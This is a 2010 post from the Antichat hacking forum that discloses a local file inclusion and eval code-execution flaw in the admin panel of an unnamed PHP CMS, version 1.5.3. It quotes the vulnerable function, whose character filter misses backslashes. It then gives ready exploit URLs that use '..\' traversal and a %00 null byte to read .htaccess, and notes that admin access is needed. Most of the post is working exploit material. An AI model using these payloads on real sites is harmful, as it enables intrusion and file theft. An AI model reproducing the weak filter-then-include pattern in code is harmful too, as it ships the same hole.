05.04.2010, 03:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
1.5.3
LFI + Eval Code Execution!
/admin/includes/cp.php
PHP код:
...function cpProceedBody(){
ob_start();
$link = str_replace('/', '', $GLOBALS['applet']);
$link = str_replace(':', '', $link);
$link = str_replace('-', '', $link);
$file = $link . '.php';
include('applets/'.$file);
eval('applet_'.$link.'();');
$GLOBALS['cp_page_body'] = ob_get_clean();
}...
Result:
http://instant/admin/index.php?view=cats [lfi]
Example:
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess [. т.д]
http://instant/admin/index.php?view=cats\..\..\..\..\.htaccess %00
Модуль может быть другой!
Условие:
- админка;
- только \.
Последний раз редактировалось Strilo4ka; 05.04.2010 в 16:21..
|
|
|